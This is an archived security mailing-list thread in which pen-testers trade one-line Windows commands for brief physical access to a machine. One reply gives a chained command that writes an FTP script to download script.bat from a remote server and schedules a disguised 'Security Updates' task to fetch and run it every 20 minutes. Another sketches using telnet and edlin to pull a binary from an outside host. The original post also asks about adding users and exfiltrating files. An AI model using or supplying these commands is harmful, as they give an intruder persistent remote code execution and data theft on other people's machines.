Nice, this is the sort of creative evil I'm looking for. :) Thanks, Adrian
On Tue, Mar 16, 2010 at 9:59 AM, Nathan Sweaney <[email protected]>wrote: > Don't forget that telnet isn't installed by default on Vista & 7. > > What about something like this: > > echo open ftp.somesite.com > %WINDIR%\ftp.scr & echo anonymous >> > %WINDIR%\ftp.scr & echo [email protected] >> %WINDIR%\ftp.scr & echo get > script.bat >> %WINDIR%\ftp.scr & echo quit >> %WINDIR%\ftp.scr & echo ftp > -s:ftp.scr > %WINDIR%\security.bat & echo start %WINDIR%\script.bat >> > %WINDIR%\security.bat & schtasks /create /tn "Security Updates" /sc minute > /mo 20 /tr security.bat > > I haven't tested it so I may have some syntax wrong, but the basic idea > should work. Now your box just checks in every 20 minutes & does whatever > you put in script.bat. > > If you wanted to get fancy, you could change script.bat to something like > 123.123.123.123.bat (or whatever it's external IP is). Then just check your > server logs to see who is connecting & you can customize your scripts to > each location. That may take a little more fancy kung fu to get your > external IP though. > > nathan > > > -----Original Message----- > From: [email protected] [mailto: > [email protected]] On Behalf Of Josh Olson > Sent: Monday, March 15, 2010 11:46 AM > To: PaulDotCom Security Weekly Mailing List > Subject: Re: [Pauldotcom] Quick keyboard pwnage > > Adrian, > > I haven't been able to make this work, but perhaps with some tweaking, > telnet and edlin can do it? > > Something like: > > telnet -f binary.exe > o site.com port > GET /path/to/binary.exe > quit > > Then edlin binary.exe /B > 1,3d > e > > Note that edlin doesn't ship with 64-bit versions of Windows. > > Josh > > On Sun, Mar 14, 2010 at 2:10 PM, Adrian Crenshaw <[email protected]> > wrote: > > Hi All, > > I need some ideas. Let's way you are the Flash (or Quicksilver if > you > > prefer Marvel comics), and could type uberfast. You have no storage > device > > with you, but like I said, you can type really fast. If you had momentary > > access to a physical box (Windows or Linux, but I'm most interest in > > Widows), what command would you run as a pen-tester? > > > > Ideas to get us started: > > 1. Net user add obviously would be an option for some. (this I know the > > command for) > > 2. Anyone know a way to enter a binary at the command line and quickly > run > > it? > > 3. Wget functionally in windows would be nice, then you could just grab > exes > > you want quickly. > > 4. Quickly upload files off of the target system to someplace you control > on > > the internet. > > > > Extra point for simple commands, quick to type, and on one line. If I use > > your idea, I'll be sure to thank you in the project notes/comments. > > > > Thanks, > > Adrian > > > > > > _______________________________________________ > > Pauldotcom mailing list > > [email protected] > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > > Main Web Site: http://pauldotcom.com > > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
